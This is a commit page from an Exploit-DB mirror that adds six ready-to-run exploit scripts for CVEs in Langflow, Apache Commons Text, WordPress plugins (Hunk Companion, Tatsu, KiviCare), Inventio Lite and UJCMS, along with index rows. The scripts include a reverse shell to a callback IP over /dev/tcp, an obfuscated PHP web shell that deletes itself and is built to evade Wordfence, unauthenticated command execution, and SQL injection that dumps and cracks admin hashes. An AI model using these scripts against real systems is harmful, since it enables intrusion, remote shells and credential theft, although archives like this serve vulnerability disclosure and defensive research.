bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-20 00:02:46 +00:00
commit 2d562cdb73
8 changed files with 770 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

107
exploits/multiple/remote/52262.txt Normal file
View file

@ -0,0 +1,107 @@
# Exploit Title: Langflow 1.3.0 - Remote Code Execution (RCE)
# Date: 2025-04-17
# Exploit Author: VeryLazyTech
# Vendor Homepage: http://www.langflow.org/
# Software Link: https://github.com/langflow-ai/langflow
# Version: Langflow < 1.3.0
# Tested on: Windows Server 2019
# CVE: CVE-2025-3248
# CVE-2025-3248 - Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
# FOFA "Langflow"
# Medium: https://medium.com/@verylazytech
# GitHub: https://github.com/verylazytech
# Shop: https://shop.verylazytech.com
# Website: https://www.verylazytech.com
import argparse
import requests
import json
from urllib.parse import urljoin
import random
from colorama import init, Fore, Style
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
# Initialize colorama
init(autoreset=True)
# Constants
ENDC = "\033[0m"
ENCODING = "UTF-8"
COLORS = [Fore.GREEN, Fore.CYAN, Fore.BLUE]
def banner():
random_color = random.choice(COLORS)
return f"""{Style.BRIGHT}{random_color}
______ _______ ____ ___ ____ ____ _________ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ /___ \| || | ( _ )
| | \ \ / /| _| __) | | | |__) |___ \ |_ \ __) | || |_ / _ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | ___) / __/|__ _| (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |____/_____| |_| \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{Style.BRIGHT}{Fore.WHITE}@VeryLazyTech - Medium {Style.RESET_ALL}\n
{Style.RESET_ALL}
"""
print(banner())
class LangflowScanner:
def __init__(self, url, timeout=10):
self.url = url.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
self.session.verify = False
self.session.headers.update({
'User-Agent': 'Mozilla/5.0',
'Content-Type': 'application/json',
'Accept': 'application/json',
})
def exploit(self, command):
endpoint = urljoin(self.url, '/api/v1/validate/code')
payload = {
"code": f"""
def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
"""
}
try:
print(f"{Fore.YELLOW}[*] Sending payload to {endpoint}")
response = self.session.post(endpoint, json=payload, timeout=self.timeout)
print(f"{Fore.YELLOW}[*] Status Code: {response.status_code}")
print(f"{Fore.YELLOW}[*] Raw Response: {response.text}")
if response.status_code == 200:
try:
data = response.json()
error_msg = data.get("function", {}).get("errors", [""])[0]
if isinstance(error_msg, str) and error_msg.startswith("b'"):
output = error_msg[2:-1].encode().decode('unicode_escape').strip()
return output
except Exception as e:
return f"[!] Failed to parse response: {str(e)}"
return f"[!] Exploit failed with status {response.status_code}"
except requests.RequestException as e:
return f"[!] Request failed: {str(e)}"
def main():
parser = argparse.ArgumentParser(description="Langflow CVE-2025-3248 Exploit")
parser.add_argument("url", help="Target base URL (e.g., http://host:port)")
parser.add_argument("cmd", help="Command to execute (e.g., whoami)")
args = parser.parse_args()
scanner = LangflowScanner(args.url)
result = scanner.exploit(args.cmd)
print(f"{Fore.GREEN}[+] Command Output:\n{result}")
if __name__ == "__main__":
main()

65
exploits/multiple/webapps/52259.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
# Exploits a flaw in the Hunk Companion plugin's permission_callback for the
# /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
# to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
# 1. Update `target_url` below with the target WordPress site's URL.
# 2. Update `plugin_name` with the slug of the plugin you want to install.
# 3. Run: python3 exploit.py
#
import requests
from urllib.parse import urljoin
# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"
# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"
endpoint = "/wp-json/hc/v1/themehunk-import"
url = urljoin(target_url, endpoint)
payload = {
"params": {
"plugin": {
plugin_name: "Plugin Label"
},
"allPlugins": [
{
plugin_name: f"{plugin_name}/{plugin_name}.php"
}
],
"themeSlug": "theme",
"proThemePlugin": "plugin",
"templateType": "free",
"tmplFreePro": "theme",
"wpUrl": target_url
}
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
"Content-Type": "application/json"
}
try:
response = requests.post(url, json=payload, headers=headers, timeout=10)
response.raise_for_status() # Raises an HTTPError if the response is not 2xx
print(f"[+] Exploit sent successfully.")
print(f"Response Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")

58
exploits/multiple/webapps/52261.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.
#!/usr/bin/env python3
import urllib.parse
import http.client
import sys
def usage():
print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}" # modify the parameter according to your target
print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")
conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json",
"Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()

61
exploits/multiple/webapps/52264.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
# Exploit Author: Cyd Tseng
# Date: 11 Dec 2024
# Category: Web application
# Vendor Homepage: https://dromara.org/
# Software Link: https://github.com/dromara/ujcms
# Version: UJCMS 9.6.3
# Tested on: Linux
# CVE: CVE-2024-12483
# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md
"""
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.
"""
import requests
from bs4 import BeautifulSoup
import time
import re
BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
def fetch_user_data(user_id):
url = BASE_URL.format(user_id)
try:
response = requests.get(url, headers=HEADERS)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.title.string.strip()
if title.lower() != '404':
username = re.sub(r' - UJCMS演示站$', '', title)
return user_id, username
return None
except requests.RequestException as e:
print(f"Error fetching data for user ID {user_id}: {e}")
return None
def user_id_generator(start, end):
for user_id in range(start, end + 1):
yield user_id
def enumerate_users(start_id, end_id):
for user_id in user_id_generator(start_id, end_id):
user_data = fetch_user_data(user_id)
if user_data:
print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
time.sleep(0.1)
if __name__ == '__main__':
start_id = int(input("Enter the starting user ID: "))
end_id = int(input("Enter the ending user ID: "))
print(f"Starting enumeration from ID {start_id} to {end_id}...")
enumerate_users(start_id, end_id)

194
exploits/php/webapps/52260.py Executable file
View file

@ -0,0 +1,194 @@
# Exploit Title:Tatsu 3.3.11 - Unauthenticated RCE
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Product: Tatsu wordpress plugin <= 3.3.11
# CVE: CVE-2021-25094
# URL: https://tatsubuilder.com/
import sys
import requests
import argparse
import urllib3
import threading
import time
import base64
import queue
import io
import os
import zipfile
import string
import random
from datetime import datetime
urllib3.disable_warnings()
class HTTPCaller():
def __init__(self, url, headers, proxies, cmd):
self.url = url
self.headers = headers
self.proxies = proxies
self.cmd = cmd
self.encodedCmd = base64.b64encode(cmd.encode("utf8"))
self.zipname = None
self.shellFilename = None
if self.url[-1] == '/':
self.url = self.url[:-1]
if proxies:
self.proxies = {"http" : proxies, "https" : proxies}
else:
self.proxies = {}
def generateZip(self, compressionLevel, technique, customShell, keep):
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED, False,
compressionLevel) as zipFile:
if technique == "custom" and customShell and os.path.isfile(customShell):
with open(customShell) as f:
shell = f.readlines()
shell = "\n".join(shell)
self.shellFilename = os.path.basename(customShell)
if self.shellFilename[0] != ".":
self.shellFilename = "." + self.shellFilename
zipFile.writestr(self.shellFilename, shell)
elif technique == "php":
# a lazy obfuscated shell, basic bypass Wordfence
# i would change base64 encoding for something better
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".php"
zipFile.writestr(self.shellFilename, shell)
elif technique.startswith("htaccess"):
# requires AllowOverride All in the apache config file
shell = "AddType application/x-httpd-php .png\n"
zipFile.writestr(".htaccess", shell)
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink('.'+'h'+'t'+'a'+'cc'+'e'+'ss');"
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".png"
zipFile.writestr(self.shellFilename, shell)
else:
print("Error: unknow shell technique %s" % technique)
sys.exit(1)
self.zipname = ''.join(random.choice(string.ascii_lowercase) for i in
range(3))
self.zipFile = buffer
def getShellUrl(self):
return "%s/wp-content/uploads/typehub/custom/%s/%s" % (self.url,
self.zipname, self.shellFilename)
def executeCmd(self):
return requests.post(url = self.getShellUrl(), data = {"text":
self.encodedCmd}, headers = self.headers, proxies = self.proxies,
verify=False)
def upload(self):
url = "%s/wp-admin/admin-ajax.php" % self.url
files = {"file": ("%s.zip" % self.zipname, self.zipFile.getvalue())}
return requests.post(url = url, data = {"action": "add_custom_font"},
files = files, headers = self.headers, proxies = self.proxies, verify=False)
def main():
description = "|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
plugin <= 3.3.8\n"
description += "|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)"
print(description)
print("")
parser = argparse.ArgumentParser()
parser.add_argument("url", help="Wordpress vulnerable URL (example:
https://mywordpress.com/)")
parser.add_argument("cmd", help="OS command to execute")
parser.add_argument('--technique', help="Shell technique: php | htaccess |
custom", default="php")
parser.add_argument('--customShell', help="Provide a custom PHP shell file
that will take a base64 cmd as $_POST['text'] input")
parser.add_argument('--keep', help="Do not auto-destruct the uploaded PHP
shell", default=False, type=bool)
parser.add_argument('--proxy', help="Specify and use an HTTP proxy
(example: http://localhost:8080)")
parser.add_argument('--compressionLevel', help="Compression level of the
zip file (0 to 9, default 9)", default=9, type=int)
args = parser.parse_args()
# Use web browser-like header
headers = {
"X-Requested-With": "XMLHttpRequest",
"Origin": args.url,
"Referer": args.url,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.9"
}
caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
print("[+] Generating a zip with shell technique '%s'" % args.technique)
caller.generateZip(args.compressionLevel, args.technique,
args.customShell, args.keep)
print("[+] Uploading zip archive to
%s/wp-admin/admin-ajax.php?action=add_custom_font" % (args.url))
r = caller.upload()
if (r.status_code != 200 or not r.text.startswith('{"status":"success"')):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Upload OK")
print("[+] Trigger shell at %s" % caller.getShellUrl())
r = caller.executeCmd()
if (r.status_code != 200):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Exploit success!")
print(r.text)
if args.keep:
print("[+] Call it with:")
print('curl -X POST -d"text=$(echo "{0}" | base64 -w0)"
{1}'.format(args.cmd, caller.getShellUrl()))
else:
print("[+] Shell file has been auto-deleted but parent directory will
remain on the webserver")
print("[+] Job done")
if __name__ == '__main__':
main()

124
exploits/php/webapps/52263.py Executable file
View file

@ -0,0 +1,124 @@
# Exploit Title: Inventio Lite 4 - SQL Injection
Error Based SQLi in "username" parameter on "/?action=processlogin."
# Date: 08/21/2024
# Exploit Author: pointedsec
# Vendor Homepage: http://evilnapsis.com
# Software Link: https://github.com/evilnapsis/inventio-lite
# Version: < 4
# Tested on: Linux, Windows
# CVE : CVE-2024-44541
# This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it.
# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
import requests
import signal
from pwn import *
BASE_URL = "http://192.168.1.51/inventio-lite/"
PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"
LOGIN_ACTION = BASE_URL + "?action=processlogin"
# Handling Ctrl + C
def def_handler(x,y):
log.failure("Quitting...")
exit(1)
signal.signal(signal.SIGINT, def_handler)
def is_vulnerable():
log.info("Checking if target is vulnerable")
payload = {
"username": "\") \"",
"password": "\") \""
}
r = requests.post(LOGIN_ACTION, data=payload)
if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text):
return True
else:
return False
def get_administrator_hash(username):
prog_hash = log.progress("Extracting Admin Password Hash")
replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
admin_hash = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", admin_hash + char),
"password": "blablablbalbablalba123@"
}
try:
r = requests.post(LOGIN_ACTION, data=payload)
r.raise_for_status()
except requests.RequestException as e:
log.error(f"Request failed: {e}")
continue
if "<script>window.location='index.php?view=home';</script>" in r.text:
admin_hash += char
prog_hash.status("-> %s" % admin_hash)
found_char = True
break
if not found_char:
break
prog_hash.status("Final Admin Hash: %s" % admin_hash)
return admin_hash
def get_administrator_username():
prog_username = log.progress("Extracting Username")
replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
username = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", username + char),
"password": "blablablablbalbla123@"
}
r = requests.post(LOGIN_ACTION, data=payload)
if "<script>window.location='index.php?view=home';</script>" in r.text:
username += char
prog_username.status("-> %s" % username)
found_char = True
break
if not found_char:
break
return username
def decrypt_password(admin_hash):
# Encryption is SHA1(MD5(PWD))
with open(PWD_DIC_PATH) as password_file:
for password in password_file:
password = password.strip()
md5_hash = hashlib.md5(password.encode()).hexdigest()
sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest()
if sha1_hash == admin_hash:
return password
log.error("Password not found in the dictionary.")
return None
if __name__ == "__main__":
# Check if target is vulnerable
if not is_vulnerable():
log.failure("Target not Vulnerable...")
exit(1)
log.success("Target Vulnerable!")
log.info("Dumping Administrator username...")
admin_username = get_administrator_username()
admin_hash = get_administrator_hash(admin_username)
pwd = decrypt_password(admin_hash)
log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")

154
exploits/php/webapps/52265.py Executable file
View file

@ -0,0 +1,154 @@
# Exploit Title: KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
SQL Injection
# Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/
# Date: 11/12/2024
# Exploit Author: Samet "samogod" Gözet
# Vendor Homepage: wordpress.org
# Software Link:
https://wordpress.org/plugins/kivicare-clinic-management-system/
# Version: < 3.6.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-11728
#!/usr/bin/env python3
"""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection PoC
Author: samogod.samet.g
Description:
Proof of Concept for Unauthenticated SQL Injection vulnerability
in KiviCare WordPress Plugin <= 3.6.4.
The vulnerability exists in the tax_calculated_data AJAX action
where the visit_type[service_id]
parameter is insufficiently escaped, allowing SQL injection attacks.
Usage:
python3 CVE-2024-11728.py -u <target_url> [-t <timeout>] [-v]
"""
import argparse
import requests
import sys
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class KiviCareExploit:
def __init__(self, url, timeout=10, verbose=False):
self.url = url.rstrip('/')
self.timeout = timeout
self.verbose = verbose
self.target = f"{self.url}/wp-admin/admin-ajax.php"
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*'
}
def log(self, message, level="info"):
"""Custom logging function"""
colors = {
"info": "\033[94m[*]",
"success": "\033[92m[+]",
"error": "\033[91m[-]",
"warning": "\033[93m[!]"
}
print(f"{colors.get(level, '[*]')} {message}\033[0m")
def verify_vulnerability(self):
"""Verify if the target is vulnerable using a time-based SQL
injection"""
self.log("Testing vulnerability with time-based SQL injection...")
data = {
'action': 'ajax_post',
'route_name': 'tax_calculated_data',
'clinic_id[id]': '1',
'doctor_id[id]': '1',
'visit_type[0][service_id]': "123) AND (SELECT * FROM
(SELECT(SLEEP(5)))alias) AND (1=1",
'_ajax_nonce': '5d77fc94cf' # You need to update this nonce value
}
try:
normal_data = {
'action': 'ajax_post',
'route_name': 'tax_calculated_data',
'clinic_id[id]': '1',
'doctor_id[id]': '1',
'visit_type[0][service_id]': "1",
'_ajax_nonce': '5d77fc94cf' # You need to update this
nonce value
}
start_time = time.time()
normal_response = requests.post(
self.target,
data=normal_data,
headers=self.headers,
verify=False,
timeout=self.timeout
)
normal_time = time.time() - start_time
if self.verbose:
self.log(f"Normal request time: {normal_time:.2f}
seconds", "info")
self.log(f"Normal response: {normal_response.text}", "info")
start_time = time.time()
try:
response = requests.post(
self.target,
data=data,
headers=self.headers,
verify=False,
timeout=self.timeout
)
elapsed_time = time.time() - start_time
if self.verbose:
self.log(f"Injection request time:
{elapsed_time:.2f} seconds", "info")
self.log(f"Request data: {data}", "info")
if elapsed_time >= 4.5:
self.log("Target appears to be vulnerable!", "success")
return True
else:
self.log("Target does not appear to be
vulnerable.", "warning")
return False
except requests.exceptions.Timeout:
self.log("Request timed out - target is vulnerable!", "success")
return True
except requests.exceptions.RequestException as e:
self.log(f"Error during vulnerability check: {str(e)}", "error")
return False
def main():
parser = argparse.ArgumentParser(description='KiviCare WordPress
Plugin Unauthenticated SQL Injection PoC (CVE-2024-11728)')
parser.add_argument('-u', '--url', required=True, help='Target URL
(e.g., http://example.com)')
parser.add_argument('-t', '--timeout', type=int, default=10,
help='Request timeout in seconds')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
args = parser.parse_args()
print("""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection
Author: samogod.samet.g
""")
exploit = KiviCareExploit(args.url, args.timeout, args.verbose)
exploit.verify_vulnerability()
if __name__ == '__main__':
main()

7
files_exploits.csv
View file

@ -11119,6 +11119,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
20491,exploits/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",remote,multiple,,2000-12-08,2012-08-13,1,CVE-2001-0034;OSVDB-4888,,,,,https://www.securityfocus.com/bid/2090/info
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/f704f2e593fbb686b4a5799dc13e8bfcec13f3c3/poc.py
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/ed5da79aadad0049d11f89fcb9ed65f987a331a1/unauth_poc.py
52262,exploits/multiple/remote/52262.txt,"Langflow 1.3.0 - Remote Code Execution (RCE)",2025-04-18,VeryLazyTech,remote,multiple,,2025-04-18,2025-04-18,0,CVE-2025-3248,,,,,
42885,exploits/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",remote,multiple,,2017-09-28,2017-09-28,0,CVE-2017-6020,,,,,
39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",remote,multiple,,2014-09-16,2016-01-25,1,,,,,,https://www.securityfocus.com/bid/69849/info
36836,exploits/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution",2015-04-27,"Jay Turla",remote,multiple,,2015-04-27,2016-10-10,1,OSVDB-121681,,,,,
@ -11726,6 +11727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,,
15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,,
52261,exploits/multiple/webapps/52261.py,"Apache Commons Text 1.10.0 - Remote Code Execution",2025-04-18,"Arjun Chaudhary",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2022-42889,,,,,
46406,exploits/multiple/webapps/46406.txt,"Apache CouchDB 2.3.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.0.tar.gz,
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
@ -12006,6 +12008,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41927,exploits/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",webapps,multiple,,2017-04-25,2017-04-25,1,CVE-2017-5799;CVE-2017-5798,"File Inclusion (LFI/RFI)",,,,https://blogs.securiteam.com/index.php/archives/3087
10012,exploits/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,webapps,multiple,,2009-09-24,2016-10-24,1,OSVDB-64918;CVE-2009-5067,,,,,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,,2021-04-15,2021-04-15,0,CVE-2021-30637,,,,,
52259,exploits/multiple/webapps/52259.py,"Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation",2025-04-18,"Jun Takemura",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-11972,,,,,
50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",2021-11-02,LiquidWorm,webapps,multiple,,2021-11-02,2021-11-02,0,,,,,,
32895,exploits/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1288;OSVDB-53658,,,,,https://www.securityfocus.com/bid/34447/info
32896,exploits/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1290;OSVDB-53660,,,,,https://www.securityfocus.com/bid/34447/info
@ -12426,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-8605,,,,,
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
52264,exploits/multiple/webapps/52264.py,"UJCMS 9.6.3 - User Enumeration via IDOR",2025-04-18,"Cyd Tseng",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-12483,,,,,
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@ -20391,6 +20395,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
